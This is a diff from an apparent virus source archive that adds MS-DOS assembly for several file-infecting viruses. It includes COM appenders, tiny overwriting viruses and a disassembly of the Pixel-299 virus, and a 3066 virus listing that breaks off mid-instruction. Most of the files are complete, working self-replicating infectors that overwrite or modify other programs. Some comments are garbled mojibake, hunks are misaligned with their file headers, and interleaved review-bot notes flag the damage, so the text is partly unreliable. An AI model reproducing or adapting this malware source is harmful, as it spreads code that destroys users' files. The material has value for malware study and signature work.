@@ -0,0 +1,165 @@ +; 쪨 ( 让) , ࠦ騩 .COM-ணࠬ +; ᪥, ᫨ 砫 JMP. +; ஢ન 直 筮 . +; +; Copyright (c) 1992, Gogi&Givi International. +; + +.model tiny +.code + org 0100h +start: + jmp virusstart ; 室 : + mov ah,09h ; ⠪, 㤥 + int 21h ; ⢮ + mov ax,4C00h ; ࠦ + int 21h + Message db 'This is little infection... He-he...',13,10,'$' + ; ଠ + ; + +virusstart: ; + pushf + push ax ; ࠭塞 , + push bx ; ⮫쪮 ... + push cx + push dx + push ds ; , ᪮쪮 + push es ; ࠢ쭮... + push si + call SelfPoint +SelfPoint: ; ।塞 + pop si ; 室 + + cld ; ࠢ + push cs ; ⠢ ᥣ + pop ds ; ॣ 祭 + push cs ; ࠢ + pop es + mov di,0100h ; ਥ - 0100h, + push si ; 砫 ணࠬ + add si,original-SelfPoint ; SI 㪠뢠 + mov cx,3 ; ਣ + rep movsb ; 㥬 砫 + pop si ; ࠦ ணࠬ + + mov ah,1Ah ; ⠢ ᮡ⢥ + mov dx,si ; DTA + add dx,VirusDTA-SelfPoint ; 21h 뢠 + int 21h + + mov ah,4Eh ; FindFirst + mov dx,si ; ᮮ⢥饩 + add dx,FileMask-SelfPoint ; ᪮ + mov cx,32 ; ਡ⮬ ⥭/ + int 21h ; , ⮡ + ; + jnc RepeatOpen ; 訡 - 뢠 + + jmp OutVirus ; 襫... + +RepeatOpen: + mov ax,3D02h ; ஥ 䠩 + mov dx,si ; ७ + add dx,NameF-SelfPoint ; ࠢ + int 21h + jc OutVirus ; 訡 室 + + mov bx,ax ; 쬥 䠩, + ; 㤥 ঠ BX + + mov ah,3Fh ; 뢠 騥 + mov dx,si ; + add dx,Original-SelfPoint ; ᯮ + mov cx,3 ; 㤥 + int 21h + jc OutVirus ; ஢ਬ 訡... + push bx + mov bx,dx + cmp byte ptr [bx],'' ; ⮬ 䠩 + pop bx ; ⮦ ᭠砫 室? + ; + je CloseNotInfect ; ࠦ! + ; , 筥 + ; ஢... + + mov ax,4202h ; 룠 + xor cx,cx ; (ᨫ) + xor dx,dx + int 21h ; AX + jc OutVirus ; 砫 + ; , ᫨ , + ; 筮, 訡 + push ax + + mov ah,40h ; 襬 + mov dx,si ; ⥫ + sub dx,SelfPoint-VirusStart ; 䠩- + mov cx,VirusEnd-VirusStart ; ⢮ + int 21h + + pop ax + jc OutVirus ; 訡 - + ; , ⠬, ९... 
+ + sub ax,3 ; ⠥ 3 - ⮡ + push bx ; 㤠 + mov bx,si + sub bx,SelfPoint-VirusStart + mov word ptr cs:[bx+1],ax ; + mov byte ptr [bx],'' ; 室 ( + ; । ᥣ) + pop bx + + mov ax,4200h ; ⥯ 砫 + xor cx,cx ; + xor dx,dx + int 21h + jc OutVirus ; ஢ઠ 訡 + + mov ah,40h ; 襬 㤠 + mov dx,si ; 室 + sub dx,SelfPoint-VirusStart ; ᭮ + mov cx,3 ; ⥫ + int 21h + jc OutVirus ; ஢ਬ 訡 + + mov ah,3Eh ; + int 21h ; ( 㦥 ࠦ - + jmp OutVirus ; ࠡ⠥) + +CloseNotInfect: + mov ah,3Eh ; 뢠 室騩 + int 21h ; 䠩 + + mov dx,si + add dx,FileMask-SelfPoint ; FindNext + mov ah,4Fh + int 21h + jc OutVirus ; 訡 - , 졠 + jmp RepeatOpen ; 室 ⨥ + +OutVirus: + pop si ; , 筮 , + pop es ; ᢥ + pop ds ; ⠭ + pop dx + pop cx + pop bx + pop ax + popf + mov si,0100h ; ᨬ ⥪ + push si ; 砫 ணࠬ + ret ; RET + + ; : + +VirusDTA db 30 dup (0) ; DTA +NameF db 13 dup (0) ; 㤥 䠩 +FileMask db '*.cOm',(0) ; ⠪ ᨢ + ; ᪠ +original: + mov dx,offset Message ; ਣ +VirusEnd: ; (᪨, + ; !) + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.203.asm b/MSDOS/Virus.MSDOS.Unknown.203.asm new file mode 100644 index 00000000..6f9d33a6 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.203.asm 
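Review bot: Every comment in this file is mojibake — the Cyrillic text was evidently stored in a DOS code page (likely a Cyrillic one such as CP866, though the page does not say) and transcoded under a different encoding, so the author's explanations are unreadable as committed; the same loss appears to have emptied the two single-quoted character literals in this hunk, so the archived bytes are not faithful to the original sample. If the original file is available, re-upload it as raw bytes rather than re-encoded text; otherwise add a header line such as `; NOTE: comments and two character literals garbled by encoding conversion; original code page unknown` so that signature or classification work is not based on this copy.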
@@ -0,0 +1,187 @@ +;****************************************************************** +;* * +;* My First Virus, a simple non-overwriting COM infector * +;* * +;* by, Solomon * +;* * +;****************************************************************** + + .model tiny ; Memory model + .code ; Start Code + org 100h ; Start of COM file + +MAIN: db 0e9h,00h,00h ; Jmp START_VIRUS + +START_VIRUS proc near ; Real start of Virus + call FIND_OFFSET + +; Calculate change in offset from host program. + +FIND_OFFSET: pop bp ; BP holds current IP + sub bp, offset FIND_OFFSET ; Calculate net change + ; Change BP to start of + ; virus code + +; Restore original bytes to the infected program. + + lea si,[bp+ORIG_START] ; Restore original 3 bytes + mov di,100h ; to 100h, start of file + push di ; Copy 3 bytes + movsw + movsb + +; Change the DTA from the default so FINDFIRST/FINDNEXT won't destroy +; original command line parameters. + + lea dx,[bp+NEW_DTA] ; Point to new DTA area + call SET_DTA ; Go change it + +; DOS Findfirst / Findnext services + + +FINDFIRST: mov ah,4eh ; DOS find first service + lea dx,[bp+COM_MASK] ; Search for any COM file + xor cx,cx ; Attribute mask +FINDNEXT: int 21h ; Call DOS to do it + jc QUIT ; Quit if there are errors + ; or no more files + +; Ok, if I am here, then I found a possible victim. Open the file and +; check it for previous infections. + + mov ax,3d00h ; DOS Open file, read only + lea dx,[bp+NEW_DTA+30] ; Point to filename we found + int 21h ; Call DOS to do it + xchg ax,bx ; Put file handle in BX + +; Check file for previous infection by checking for our presence at +; then end of the file. 
+ + mov ah,3fh ; DOS Read file + lea dx,[bp+ORIG_START] ; Save the original header + mov cx,3 ; Read 3 bytes + int 21h ; Call DOS to do it + mov ax,word ptr [bp+NEW_DTA+26] ; Put filename in AX + mov cx,word ptr [bp+ORIG_START+1] ; Jmp offset + add cx,END_VIRUS-START_VIRUS+3; Convert to filesize + cmp ax,cx ; Compare file size's + jnz INFECT_COM ; If healthy, go infect it + mov ah,3eh ; Otherwise close file and + int 21h ; try to find another victim + mov ah,4fh ; DOS find next file + jmp short FINDNEXT ; Find another file + +; Restore default DTA and pass control back to original program. +; Call any activation routines here. + +QUIT: mov dx,80h ; Restore original DTA + call SET_DTA ; Go change it + retn ; End Virus and start original + ; Program. Remember, DI holding + ; 100h was pushed on the stack. + +;*** Subroutine INFECT_COM *** + +INFECT_COM: + +; Reset the file attributes to normal so I can write to the file + + mov ax,4301h ; DOS change file attr + xor cx,cx ; Zero attributes + lea dx,[bp+NEW_DTA+30] ; Point to filename in DTA + int 21h ; Call DOS to do it + +; Calculate jump offset for header of victim so it will run virus first. + + mov ax,word ptr [bp+NEW_DTA+26] ; Put filesize in AX + sub ax,3 ; Subtract 3, size-jmp_code + mov word ptr [bp+JMP_OFFSET],ax ; Store new offset + +; Close the file and reopen it for read/write. BX still holds file handle. + + mov ah,3eh ; DOS close file + int 21h ; Call DOS to do it + mov ax,3d02h ; DOS open file, read/write + int 21h ; Call DOS to do it + xchg ax,bx ; Put file handle in BX + +; Write the new header at the beginning of the file. + + mov ah,40h ; DOS write to file + mov cx,3 ; Write 3 bytes + lea dx,[bp+HEADER] ; Point to the 3 bytes to write + int 21h ; Call DOS to do it + +; Move to end of file so I can append the virus to it. + + mov al,2 ; Select end of file + call FILE_PTR ; Go to end of file + +; Append the virus to the end of the file. 
+ + mov ah,40h ; DOS write to file + mov cx,END_VIRUS-START_VIRUS ; Length of virus + lea dx,[bp+START_VIRUS] ; Start from beginning of virus + int 21h ; Call DOS to do it + +; Restore the file's original timestamp and datestamp. These values were +; stored in the DTA by the Findfirst / Findnext services. + + mov ax,5701h ; DOS set file date & time + mov cx,word ptr [bp+NEW_DTA+22] ; Set time + mov dx,word ptr [bp+NEW_DTA+24] ; Set date + int 21h ; Call DOS to do it + +; Restore original file attributes. + + mov ax,4301h ; DOS change file attr + mov cx,word ptr [bp+NEW_DTA+21] ; Get original file attr + lea dx,[bp+NEW_DTA+30] ; Point to file name + int 21h ; Call DOS + +; Lastly, close the file and go back to main program. + + mov ah,3eh ; DOS close file + int 21h ; Call DOS to do it + jmp QUIT ; We're done + +;*** Subroutine SET_DTA *** + +SET_DTA proc near + mov ah,1ah ; DOS set DTA + int 21h ; Call DOS to do it + retn ; Return +SET_DTA endp + + +;*** Subroutine FILE_PTR *** + + +FILE_PTR proc near + mov ah,42h ; DOS set read/write pointer + xor cx,cx ; Set offset move to zero + cwd ; Equivalent to xor dx,dx + int 21h ; Call DOS to do it + retn ; Return +FILE_PTR endp + + + +; This area will hold all variables to be encrypted + +COM_MASK db '*.com',0 ; COM file mask + +ORIG_START db 0cdh,20h,0 ; Header for infected file + +HEADER db 0e9h ; Jmp command for new header + +START_VIRUS endp + +END_VIRUS equ $ ; Mark end of virus code + +; This data area is a scratch area and is not included in virus code. + +JMP_OFFSET dw ? ; Jump offset for new header +NEW_DTA db 43 dup(?) ; New DTA location + + end MAIN diff --git a/MSDOS/Virus.MSDOS.Unknown.23.asm b/MSDOS/Virus.MSDOS.Unknown.23.asm new file mode 100644 index 00000000..5a1c07b3 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.23.asm 
@@ -0,0 +1,37 @@
+; The EXEcution III Virus.
+;
+; Well, you're now the prouw owner of the smallest virus ever made!
+; only 23 bytes long and ofcourse again very lame..
+; But what the heck, it's just an educational piece of code!!
+;
+; (C) 1993 by [DRkRY] of TridenT (Ooooooranje Boooooooven!)
+;
+; Tnx to myself, my assembler, DOS (yuck) and to John Tardy for his
+; nice try to make the smallest (27 bytes and 25 bytes) virus... gotcha!! ;-))
+;
+; BTW Don't forget, I only tested it unter DOS 5.0 so on other versions
+; it might not work!
+
+_CODE SEGMENT
+ ASSUME CS:_CODE
+
+ ORG 100h
+START: ; That's where we're starting...
+ FILE DB '*.*',0h ; Dummy instruction, SUB's 0FFh from CH
+
+ MOV AH,4Eh ; Let's search!
+DO_IT: MOV DX,SI ; Make DX = 100h (offset file)
+ INT 21h ; Search now dude!
+
+ MOV AX,3D01h ; Hmm, infect that fucking file!
+ MOV DX,9Eh ; Name is at DS:[9Eh]
+ INT 21h ; Go do it!
+ XCHG BX,AX ; Put the handle in BX
+
+ MOV AH,40h ; Write myself!
+ JMP DO_IT ; Use other routine
+
+_CODE ENDS
+ END START
+
+; If you don't like my english: Get lost, you can understand it!
diff --git a/MSDOS/Virus.MSDOS.Unknown.25.asm b/MSDOS/Virus.MSDOS.Unknown.25.asm
new file mode 100644
index 00000000..ec555e8e
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.25.asm
@@ -0,0 +1,30 @@
+; Basic little bitty program for people learning about the different modes
+; you can stick on your monitor. This program will put you into 80*50 on a
+; VGA monitor, and should be 80*43 on an EGA monitor (I dunno, haven't tested
+; it.) Anyways, I tried to comment it so someone not knowing asm would be
+; able to understand it.
+;
+; Coded by The Crypt Keeper/Kevin Marcus
+; You may feel free to do absolutely anything to this code, so long as it is
+; not distributed in a modified state. (Incorporate it in your programs, I
+; don't care. Just do not change >THIS< program.)
+;
+; The Programmer's Paradise. (619)/457-1836
+
+IDEAL ; Ideal Mode in TASM is t0tallie /< rad man.
+DOSSEG ; Standard Segment shit.
+MODEL tiny ; What model are we in?!
+DATASEG ; Data Segment starts here, man.
+exitcode db 0 ; 'exitcode' be zer0, man.
+CODESEG ; Code Segment starts here, dude.
+ org 100h ; Where do .COM files start?
+Start:
+ mov ax,0003h ; stick 3 into ax.
+ int 10h ; Set up 80*25, text mode. Clear the screen, too.
+
+Exit:
+
+ mov ah,4ch ; Lets ditch.
+ mov al,[exitcode] ; Make al 0. Why not xor!? Suck a ____.
+ int 21h ; "Make it so."
+ END Start ; No more program.
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.299.asm b/MSDOS/Virus.MSDOS.Unknown.299.asm
new file mode 100644
index 00000000..62a866ff
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.299.asm
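Review bot: The header comment does not match the code: it says the program puts the display into 80*50, but the only video call is `mov ax,0003h` / `int 10h`, which the inline comment itself describes as 80*25 text mode, after which the program exits through DOS function 4Ch. Nothing in the file searches for, opens or writes any other file, so the `Virus.` prefix in the path looks like a mis-filing of a video-mode demo. A one-line header such as `; NOTE: sets text mode 3 (80x25) and exits; no self-replicating code in this file` would stop analysts from deriving signatures or statistics from it.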
@@ -0,0 +1,150 @@ + +;***************************************************************************** +; +; Pixel - 299 virus +; +; Disassembled By Admiral Bailey [YAM '92] +; +; Notes: I dont know where the hell I got this one from but when I found it on +; one of my disks it was named incorectly. Some Amst shit but I looked +; it up in the vsum and its named as Pixel so Il use that name. +; Anyways its just a plain com infecting virus that displays a messege +; when executed. Nothing big. +; +;***************************************************************************** + +data_1e equ 6Ch +data_2e equ 96h +data_3e equ 98h +data_4e equ 9Eh +data_15e equ 12Bh ;* +data_16e equ 12Dh ;* + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +Pixel proc far + +start: + jmp short begin + dw 5649h +data_7 db 0 +data_8 db 2Ah, 2Eh, 43h, 4Fh, 4Dh, 0 ; '*.com' +data_10 dw 0, 8918h +data_12 dw 0 + +begin: ; loc_1: + push ax + mov ax,cs + add ax,1000h + mov es,ax + inc data_7 + mov si,100h + xor di,di ; Zero register + mov cx,12Bh + rep movsb ; Mov [si] to es:[di] + mov dx,offset data_8 ; load the type of file to find + mov cx,6 ; Im not sure what attrib + mov ah,4Eh ; Find first file + int 21h ; + + jc quit ; if none found then... 
+get_file: ; loc_2 + mov dx,data_4e ; file name + mov ax,3D02h ; open file + int 21h + + mov bx,ax + push es + pop ds + mov dx,data_15e ; buffer for read + mov cx,0FFFFh ; number of bytes to read + mov ah,3Fh ; read file + int 21h + + add ax,12Bh + mov cs:data_12,ax + cmp word ptr ds:data_16e,5649h ; probably comparing size + je not_this_file ; of file + xor cx,cx ; Zero register + mov dx,cx + mov ax,4200h ; move file pointer + int 21h + + jc not_this_file ; if error the quit this file + xor dx,dx ; Zero register + mov cx,cs:data_12 + mov ah,40h ; write virus to file + int 21h + + mov cx,cs:data_2e ; old date + mov dx,cs:data_3e ; new time + mov ax,5701h ; set files date & time + int 21h + +not_this_file: ; loc_3: + mov ah,3Eh ; close this file + int 21h + + push cs + pop ds + mov ah,4Fh ; find another file + int 21h + + jc quit ; if none found quit + jmp short get_file ; if found then infect +quit: ; loc_4 + cmp data_7,5 + jb loc_5 ; Jump if below + mov ax,40h + mov ds,ax + mov ax,ds:data_1e + push cs + pop ds + and ax,1 + jz loc_5 ; Jump if zero + mov dx,offset data_13 ; gets the messege + mov ah,9 ; display string + int 21h + + int 20h ; Quit program + +data_13 db 'Program sick error:Call doctor o' ; messege + db 'r buy PIXEL for cure description' ; displayed when + db 0Ah, 0Dh, '$' ; run +loc_5: + mov si,offset data_14 + mov cx,22h + xor di,di ; Zero register + rep movsb ; Rep when cx >0 Mov [si] to es + pop bx + mov cs:data_10,0 + mov word ptr cs:data_10+2,es + jmp dword ptr cs:data_10 + +data_14 db 1Eh ; cant figure this + db 07h,0BEh, 2Bh, 02h,0BFh, 00h ; part out... + db 01h,0B9h,0FFh,0FFh, 2Bh,0CEh ; probably infected + db 0F3h,0A4h, 2Eh,0C7h, 06h, 00h ; file before. + db 01h, 00h, 01h, 2Eh, 8Ch, 1Eh + db 02h, 01h, 8Bh,0C3h, 2Eh,0FFh + db 2Eh, 00h, 01h,0CDh ; this is an int 20h + db 20h + +Pixel endp + +seg_a ends + + end start + + +>>> Article From Evolution #1 - YAM '92 + +Article Title: Thrasher Trojan Disassembly +Author: Natas Kaupas + + + 
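Review bot: The hunk carries text after `end start` that belongs to a different document — the `>>> Article From Evolution #1`, `Article Title: Thrasher Trojan Disassembly` and `Author:` lines are the opening of the next zine article, not part of the Pixel listing. MASM-style assemblers ignore everything after END, so it assembles unchanged, but it misleads anyone cataloguing the sample by its trailing text or searching the corpus for the Thrasher article. Either drop those lines or mark them, e.g. `; --- trailing zine text, not part of the Pixel listing ---`.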
diff --git a/MSDOS/Virus.MSDOS.Unknown.29bytes.asm b/MSDOS/Virus.MSDOS.Unknown.29bytes.asm
new file mode 100644
index 00000000..1ea72ccc
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.29bytes.asm
@@ -0,0 +1,35 @@
+;Smallest in the trivial series of viruses, I think....
+;Last I saw was 30 bytes - this one goes to 29.
+;Code by Stormbringer... stupid virus, but small.
+
+.model tiny
+.radix 16
+.code
+ org 100
+start:
+
+FindFile:
+ xchg cx,ax ;ax defaults to zero on runtime - cx doesn't
+ push si ;si defaults to 100h under dos - use this l8r
+ mov dx,offset filemask
+ mov ah,4e
+ int 21
+
+OverwriteFile:
+ mov dx,9e
+ mov ah,3c
+ int 21
+
+WriteVirus:
+ xchg bx,ax
+ mov ah,40
+ pop dx ;get 100h from si earlier for write pointer
+ mov cl,endvir-start ;move only to CL, CH is already zero
+ int 21
+
+Terminate:
+ ret ;terminate by returning to PSP (Int 20)
+
+filemask db '*.*',0
+endvir:
+end start
diff --git a/MSDOS/Virus.MSDOS.Unknown.30.asm b/MSDOS/Virus.MSDOS.Unknown.30.asm
new file mode 100644
index 00000000..66f6c9c1
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.30.asm
@@ -0,0 +1,26 @@
+code segment
+ assume cs:code,ds:code,es:code,ss:code
+ org 100h
+main proc near
+ mov dx,offset(nev) ; offset to '*.*'
+ mov ah,4Eh
+ int 21h ; find first
+ mov dx,009Eh
+ mov ax,3D01h ; writing
+ int 21h ; open a file
+ mov bx,ax
+ mov ah,40h
+ mov cl,offset(nev)-100h+4 ; byte-szam
+ mov dx,100h
+ int 21h ; write to file
+nev: DB '*.*'
+DB 0h
+main endp
+code ends
+ end main
+
+;;
+;> and Remember Don't Forget to Call <;
+;> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <;
+;;
+
diff --git a/MSDOS/Virus.MSDOS.Unknown.3066.asm b/MSDOS/Virus.MSDOS.Unknown.3066.asm
new file mode 100644
index 00000000..70933dc5
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.3066.asm
@@ -0,0 +1,1491 @@ + +PAGE 59,132 + +; +; +; 3066 +; +; Created: 19-Mar-89 +; Version: +; Passes: 5 Analysis Options on: QRS +; +; +; + +.286c + +data_1e equ 24h ; (0000:0024=45h) +data_2e equ 26h ; (0000:0026=3D1h) +data_3e equ 70h ; (0000:0070=0FF53h) +data_4e equ 72h ; (0000:0072=0F000h) +data_5e equ 80h ; (0000:0080=1094h) +data_6e equ 82h ; (0000:0082=123h) +data_7e equ 84h ; (0000:0084=109Eh) +data_8e equ 86h ; (0000:0086=123h) +data_9e equ 90h ; (0000:0090=156h) +data_10e equ 92h ; (0000:0092=44Bh) +data_11e equ 9Ch ; (0000:009C=0BCh) +data_13e equ 0B3h ; (0000:00B3=1) +data_14e equ 0C8h ; (0000:00C8=0DAh) +data_15e equ 0D1h ; (0000:00D1=10h) +data_16e equ 0DFh ; (0000:00DF=1) +data_17e equ 0E3h ; (0000:00E3=1) +data_18e equ 0EAh ; (0000:00EA=123h) +data_19e equ 0ECh ; (0000:00EC=10DAh) +data_20e equ 0EEh ; (0000:00EE=23h) +data_21e equ 0F1h ; (0000:00F1=10h) +data_22e equ 151h ; (0000:0151=0EAh) +data_23e equ 153h ; (0000:0153=0A6F0h) +data_24e equ 155h ; (0000:0155=0EAh) +data_25e equ 449h ; (0000:0449=3) +data_26e equ 972h ; (0000:0972=74h) +data_27e equ 80h ; (00AE:0080=0FFh) +data_28e equ 0A0h ; (5E5F:00A0=0FFh) +data_29e equ 0F00h ; (5E5F:0F00=0FFh) +data_30e equ 0FA0h ; (5E5F:0FA0=0FFh) +data_31e equ 0FF60h ; (5E5F:FF60=0FFFFh) +data_32e equ 0E0h ; (683D:00E0=0FFFFh) +data_33e equ 0 ; (6FB8:0000=0) +data_34e equ 4 ; (6FB8:0004=0) +data_35e equ 5 ; (6FB8:0005=0) +data_36e equ 87h ; (6FB8:0087=0) +data_37e equ 0A0h ; (6FB8:00A0=0) +data_38e equ 0DFh ; (6FB8:00DF=0) +data_39e equ 0E0h ; (6FB8:00E0=0) +data_40e equ 0E2h ; (6FB8:00E2=0) +data_41e equ 0E3h ; (6FB8:00E3=0) +data_42e equ 0E4h ; (6FB8:00E4=0) +data_43e equ 0E6h ; (6FB8:00E6=0) +data_44e equ 0E8h ; (6FB8:00E8=0) +data_45e equ 0EAh ; (6FB8:00EA=0) +data_46e equ 0ECh ; (6FB8:00EC=0) +data_47e equ 0EEh ; (6FB8:00EE=0) +data_48e equ 0EFh ; (6FB8:00EF=0) +data_49e equ 0F1h ; (6FB8:00F1=0) +data_50e equ 0F3h ; (6FB8:00F3=0) +data_51e equ 0F5h ; (6FB8:00F5=0) +data_93e equ 100h ; (7188:0100=0) 
+data_94e equ 0E2h ; (969B:00E2=0) + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +3066 proc far + +start: + jmp loc_5 ; (0243) + db 01h,0B4h +data_54 dw 0CD09h ; Data table (indexed access) + ; xref 6FB8:0ADC, 0B5E, 0BA4, 0C67 + ; 0C7B, 0CCB, 0CD4 + db 21h,0B8h, 00h, 4Ch,0CDh, 21h + db 'This program only exists to beco' + + + + + + db 'me infected - COM version', 0Dh, 0Ah + + + + + db '$' + db 8Dh, 16h, 0Dh,0FFh,0FFh, 00h + db 01h, 8Ch +data_56 dw 4D10h ; Data table (indexed access) + ; xref 6FB8:0270, 02DC, 046C +data_57 dw 6FB8h ; Data table (indexed access) + ; xref 6FB8:0276, 02E0, 0470 +data_58 db 0 ; Data table (indexed access) + ; xref 6FB8:0387, 03C8, 0608, 06A4 + db 8Dh, 16h, 0Dh,0FFh,0FFh, 09h + db 0CDh, 21h,0B8h, 00h, 4Ch,0CDh + db '!This program on', 0Dh, 0Ah, '$' + + + + db 27 dup (0) + db 50h, 4Ch, 49h, 43h + db 60 dup (0) + db 01h, 3Fh + db 7 dup (3Fh) + db 43h, 4Fh, 4Dh, 20h, 00h + db 7 dup (0) + db 20h, 96h, 66h,0D7h, 12h, 4Ch + db 00h, 00h, 00h + db 'TSTJ3066.COM' + + db 00h, 00h, 01h, 3Fh + db 10 dup (3Fh) + db 10h, 05h + db 7 dup (0) + db 20h,0E9h, 11h,0B5h, 12h,0F6h + db 48h, 02h, 00h + db 'CAT-TWO.ARC' + + db 00h, 00h, 00h, 00h,0BCh, 0Eh + db 00h, 00h, 20h, 00h, 72h, 49h + db 73h, 12h,0EBh, 04h,0DDh, 0Ch + db 00h, 00h, 00h, 51h, 59h, 8Bh + db 0Fh, 20h, 00h + db 56h, 47h, 31h +loc_5: ; xref 6FB8:0100 + jmp short loc_6 ; (0247) + db 0F5h, 0Bh +loc_6: ; xref 6FB8:0243 + call sub_17 ; (08BB) + call sub_15 ; (0875) + mov ah,19h + int 21h ; DOS Services ah=function 19h + ; get default drive al (0=a:) + mov ds:data_22e[si],si ; (0000:0151=0EAh) + add word ptr ds:data_22e[si],884h ; (0000:0151=0EAh) + mov ds:data_23e[si],cs ; (0000:0153=0A6F0h) + mov ds:data_17e[si],al ; (0000:00E3=1) + call sub_10 ; (076E) + mov dl,ds:data_94e[di] ; (969B:00E2=0) + mov ax,ds + push cs + pop ds + jnz loc_8 ; Jump if not zero + mov data_56[si],984h ; (6FB8:0151=4D10h) + mov data_57[si],ax ; (6FB8:0153=6FB8h) + cmp dl,0FFh + je loc_8 ; Jump 
if equal + mov ah,0Eh + int 21h ; DOS Services ah=function 0Eh + ; set default drive dl (0=a:) +loc_8: ; xref 6FB8:026E, 027D + mov byte ptr ds:[872h][si],80h ; (6FB8:0872=0FFh) + mov word ptr ds:data_48e[si],0 ; (6FB8:00EF=0) + mov ah,2Ah ; '*' + int 21h ; DOS Services ah=function 2Ah + ; get date, cx=year, dx=mon/day + cmp cx,7C4h + jge loc_9 ; Jump if > or = + jmp short loc_12 ; (02C2) + db 0BDh, 09h,0BCh, 0Eh, 00h +loc_9: ; xref 6FB8:0296 + jg loc_10 ; Jump if > + cmp dh,0Ch + jl loc_12 ; Jump if < + cmp dl,5 + jl loc_12 ; Jump if < + cmp dl,1Ch + jl loc_11 ; Jump if < +loc_10: ; xref 6FB8:029F + mov word ptr ds:[877h][si],0FFDCh ; (6FB8:0877=8EC0h) + mov byte ptr ds:[872h][si],88h ; (6FB8:0872=0FFh) +loc_11: ; xref 6FB8:02AE + cmp byte ptr [si+4],0F8h + nop ;*ASM fixup - displacement + jae loc_13 ; Jump if above or = +loc_12: ; xref 6FB8:0298, 02A4, 02A9, 0356 + mov byte ptr cs:data_47e[si],0 ; (6FB8:00EE=0) + jmp loc_30 ; (0460) + cmp byte ptr [si+4],0F8h + nop ;*ASM fixup - displacement + jae loc_13 ; Jump if above or = + or byte ptr ds:[872h][si],4 ; (6FB8:0872=0FFh) +loc_13: ; xref 6FB8:02C0, 02D0 + mov byte ptr ds:data_38e[si],0 ; (6FB8:00DF=0) + mov dx,data_56[si] ; (6FB8:0151=4D10h) + mov ds,data_57[si] ; (6FB8:0153=6FB8h) + mov ax,4300h + call sub_1 ; (0436) + jc loc_14 ; Jump if carry Set + mov cs:data_51e[si],cx ; (6FB8:00F5=0) + and cl,0FEh + mov ax,4301h + call sub_1 ; (0436) + jc loc_14 ; Jump if carry Set + mov ax,3D02h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + jc loc_14 ; Jump if carry Set + push cs + pop ds + mov ds:data_48e[si],ax ; (6FB8:00EF=0) + mov bx,ax + mov ax,5700h + int 21h ; DOS Services ah=function 57h + ; get/set file date & time + mov ds:data_49e[si],cx ; (6FB8:00F1=0) + mov ds:data_50e[si],dx ; (6FB8:00F3=0) + dec byte ptr [si+4] + nop ;*ASM fixup - displacement + mov dx,word ptr ds:[880h][si] ; (6FB8:0880=687h) + mov cx,word ptr ds:[882h][si] ; (6FB8:0882=90h) + add dx,4 + nop ;*ASM fixup - 
sign extn byte + adc cx,0 + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset +loc_14: ; xref 6FB8:02EA, 02FA, 0301 + push cs + pop ds + test byte ptr ds:[872h][si],4 ; (6FB8:0872=0FFh) + jz loc_15 ; Jump if zero + call sub_3 ; (051F) + jmp loc_30 ; (0460) +loc_15: ; xref 6FB8:0337 + xor dl,dl ; Zero register + mov ah,47h ; 'G' + push si + add si,46h + int 21h ; DOS Services ah=function 47h + ; get present dir,drive dl,1=a: + pop si + cmp byte ptr ds:data_47e[si],0 ; (6FB8:00EE=0) + jne loc_16 ; Jump if not equal + call sub_2 ; (0444) + jnc loc_17 ; Jump if carry=0 +loc_16: ; xref 6FB8:034F + jmp loc_12 ; (02C2) +loc_17: ; xref 6FB8:0354, 0433 + mov dx,si + add dx,data_36e ; (6FB8:0087=0) + mov ah,1Ah + int 21h ; DOS Services ah=function 1Ah + ; set DTA to ds:dx + mov word ptr [si+5],2E2Ah + mov word ptr [si+7],4F43h + mov word ptr [si+9],4Dh + mov ah,4Eh ; 'N' + mov dx,si + add dx,5 +loc_18: ; xref 6FB8:03A7 + mov cx,20h + call sub_1 ; (0436) + jc loc_21 ; Jump if carry Set + mov dx,si + add dx,0A5h + mov data_58[si],0 ; (6FB8:0155=0) + call sub_4 ; (0535) + jc loc_20 ; Jump if carry Set + call sub_3 ; (051F) +loc_19: ; xref 6FB8:039C + jmp loc_29 ; (0454) +loc_20: ; xref 6FB8:038F + cmp byte ptr ds:data_20e[si],0 ; (0000:00EE=23h) + jne loc_19 ; Jump if not equal + cmp byte ptr ds:data_24e[si],0 ; (0000:0155=0EAh) + jne loc_25 ; Jump if not equal + mov ah,4Fh ; 'O' + jmp short loc_18 ; (0379) +loc_21: ; xref 6FB8:037F + mov word ptr [si+7],5845h + mov word ptr [si+9],45h + mov ah,4Eh ; 'N' + mov dx,si + add dx,5 +loc_22: ; xref 6FB8:03E9 + mov cx,20h + call sub_1 ; (0436) + jc loc_25 ; Jump if carry Set + mov dx,si + add dx,0A5h + mov data_58[si],0 ; (6FB8:0155=0) + call sub_4 ; (0535) + jc loc_24 ; Jump if carry Set + call sub_3 ; (051F) +loc_23: ; xref 6FB8:03DE + jmp short loc_29 ; (0454) + db 90h +loc_24: ; xref 6FB8:03D0 + cmp byte ptr cs:data_47e[si],0 ; (6FB8:00EE=0) + jne loc_23 ; Jump if not equal + cmp byte ptr 
